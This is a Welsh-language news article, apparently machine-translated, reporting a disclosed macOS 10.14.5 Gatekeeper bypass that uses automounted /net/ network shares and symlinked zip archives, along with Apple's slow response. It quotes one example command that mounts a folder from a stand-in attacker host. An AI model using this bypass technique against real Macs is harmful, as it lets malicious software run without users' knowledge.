Mae'n hawdd gosod app maleisus ar Mac. Nid yw Apple wedi trwsio'r gwall hyd yn oed ar ôl tri mis

27. 5. 2019

Postiodd yr ymchwilydd diogelwch Filippo Cavallarin rybudd am y byg yn macOS 10.14.5 ar ei flog. Mae hyn yn cynnwys y posibilrwydd o osgoi mesurau diogelwch Gatekeeper yn llwyr. Yn ôl Cavallarin, tynnodd sylw at y gwall i Apple eisoes ym mis Chwefror eleni, ond ni thrwsiodd y cwmni yn y diweddariad diweddaraf.

Datblygwyd Gatekeeper gan Apple a'i ymgorffori yn ei system weithredu bwrdd gwaith am y tro cyntaf yn 2012. Mae'n fecanwaith sy'n atal cais rhag rhedeg heb yn wybod i'r defnyddiwr a chaniatâd. Ar ôl i chi lawrlwytho ap, mae Gatekeeper yn gwirio ei god yn awtomatig i weld a yw'r feddalwedd wedi'i llofnodi'n gywir gan Apple.

Yn ei bost blog, mae Cavallarin yn nodi bod Gatekeeper, yn ddiofyn, yn ystyried storio allanol a chyfranddaliadau rhwydwaith yn lleoliadau diogel. Felly, gellir lansio unrhyw gais sy'n rhan o'r targedau hyn yn awtomatig heb orfod mynd trwy'r gwiriad Gatekeeper. Y nodwedd hon y gellir ei hecsbloetio i lansio meddalwedd maleisus heb yn wybod i'r defnyddiwr.

Un agwedd sy'n caniatáu mynediad anawdurdodedig yw'r nodwedd awtomatig, sy'n caniatáu i ddefnyddwyr osod cyfran rhwydwaith yn awtomatig yn syml trwy nodi llwybr sy'n dechrau gyda "/net/". Er enghraifft, mae Cavallarin yn dyfynnu'r llwybr "ls /net/evil-attacker.com/sharedfolder/" a all achosi i'r system weithredu lwytho cynnwys ffolder "sharefolder" mewn lleoliad anghysbell a all fod yn faleisus.

Gallwch wylio'r ffordd y mae'r bygythiad yn gweithio yn y fideo:

Ffactor arall yw'r ffaith, os rhennir archif zip sy'n cynnwys symlink penodol sy'n arwain at y swyddogaeth automount, ni chaiff ei wirio gan Gatekeeper. Fel hyn, gall y dioddefwr lawrlwytho'r archif maleisus yn hawdd a'i ddadsipio, gan ganiatáu i'r ymosodwr redeg bron unrhyw feddalwedd ar y Mac heb yn wybod i'r defnyddiwr. Mae gan y Darganfyddwr, sy'n cuddio rhai estyniadau yn ddiofyn, ei gyfran o'r bregusrwydd hwn hefyd.

Mae Cavallarin yn nodi ar ei flog bod Apple wedi tynnu sylw at fregusrwydd y system weithredu macOS ar Chwefror 22 eleni. Ond ganol mis Mai, rhoddodd Apple y gorau i gyfathrebu â Cavallarin, felly penderfynodd Cavallarin wneud yr holl beth yn gyhoeddus.

Ffynhonnell: FCVL

Pynciau: storfa, yn awtomatig, MacOS, fideo, Gosodiadau, ffync, defnyddiwr, Cymwynas, Afal

Trafod yr erthygl

Eich enw

Eich sylw

Wrth lenwi'r data uchod, rwy'n cydnabod bod y cwmni TEXT FACTORY s.ro., swyddfa gofrestredig yn Brno, Durďákova 336/29, Černá Pole, ZIP cod: 613 00, rhif ID: 06157831, wedi'i gofrestru yn y Llys Rhanbarthol yn Brno, adran C , mewnosoder 100399, yn prosesu fy nata personol a ddarparwyd yn y ffurflen gofrestru a gwblhawyd gennyf ar sail buddiannau cyfreithlon TEXT FFATRI sro yn unol â llythyr Erthygl 6 paragraff 1 f) GDPR ac i gyflawni rhwymedigaethau cyfreithiol (Erthygl 6, paragraff 1, llythyr c) GDPR), at y dibenion a ganlyn: yr angen i sicrhau awdurdodiad ymwelwyr i wefannau a weithredir gan TEXT FACTORY sro i gyfrannu’n weithredol at erthyglau cyhoeddedig neu o fewn trafodaeth fforymau ac arfer hawliau TEXT FACTORY sro fel gweinyddwr y fforymau trafod hyn. Ceir rhagor o wybodaeth am brosesu data personol a hawliau yn Gwersi ar ddiogelu data personol. y testun cyfan

Gallai fod o ddiddordeb i chi

Cysylltiedig